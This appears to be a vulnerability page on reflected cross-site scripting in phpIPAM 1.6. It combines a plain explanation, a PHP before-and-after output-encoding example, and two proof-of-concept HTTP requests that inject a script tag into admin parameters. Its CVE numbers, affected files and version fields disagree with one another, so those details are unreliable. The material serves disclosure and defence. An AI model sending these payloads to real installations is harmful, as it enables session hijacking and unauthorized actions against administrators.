phpIPAM 1.6 was vulnerable to a reflected Cross-Site Scripting (XSS) issue, identified as CVE-2023-44171.
The vulnerability primarily affected administrative sections, specifically the `subnetId` parameter in scripts like `app/admin/routing/edit-bgp.php`. It occurred because user-supplied input for `subnetId` was echoed directly into the HTML without proper sanitization or output encoding.
An attacker could craft a malicious URL containing JavaScript payloads. If an authenticated user (e.g., administrator or editor) clicked this link, the malicious script would execute in their browser. This could lead to session hijacking, unauthorized actions, data theft, or redirection.
The issue was patched in phpIPAM version 1.6.1. Users are strongly advised to upgrade to the latest stable release to mitigate this risk.
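The missing output encoding described above and its correction, as an added example that is not phpIPAM source code or the 1.6.1 patch. The handler functions, the `e()` helper and the assumption that `subnetId` is a positive integer are hypothetical; the sample input is the URL-decoded payload string from the proofs of concept on this page.

```php
<?php
declare(strict_types=1);

// Encode a string for HTML text or a quoted attribute value.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Before": the request value is concatenated into an attribute as received.
function render_vulnerable(array $req): string
{
    return '<input type="hidden" name="subnetId" value="' . ($req['subnetId'] ?? '') . '">';
}

// "After": validate the id as a positive integer (assumption), then encode anyway.
function render_hardened(array $req): string
{
    $id = filter_var($req['subnetId'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return '<p class="error">Invalid subnetId</p>';
    }
    return '<input type="hidden" name="subnetId" value="' . e((string)$id) . '">';
}

// Parameter names are request-controlled too (one PoC on this page places
// markup in a key), so keys are encoded as well as values.
function render_fields(array $req): string
{
    $out = '';
    foreach ($req as $name => $value) {
        if (!is_string($value)) {
            continue; // skip nested arrays rather than printing "Array"
        }
        $out .= '<li>' . e((string)$name) . ' = ' . e($value) . "</li>\n";
    }
    return $out;
}

// Constructed sample input: the decoded payload string from the PoCs.
$payload = '"><script>alert(1)</script>';

echo render_vulnerable(['subnetId' => $payload]), "\n"; // attribute is closed early
echo render_hardened(['subnetId' => $payload]), "\n";   // rejected by validation
echo render_hardened(['subnetId' => '42']), "\n";       // valid id rendered
echo render_fields(['importFields__' . $payload => 'anyValue']); // key encoded
```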
# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41358
Proof Of Concept
GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue
# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41357
Proof Of Concept
# PoC to trigger XSS vulnerability in phpipam 1.6
# Ensure you are logged in as an admin user to satisfy the admin check condition.
# Send the following POST request to trigger the XSS vulnerability:
POST /app/admin/powerDNS/record-edit.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Content-Length: <calculated_length>

action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
# This will execute the alert(1) script when the response is rendered in the browser.
phpIPAM 1.6 Cross Site Scripting
- Written by: khalil shreateh
- Category: Vulnerabilities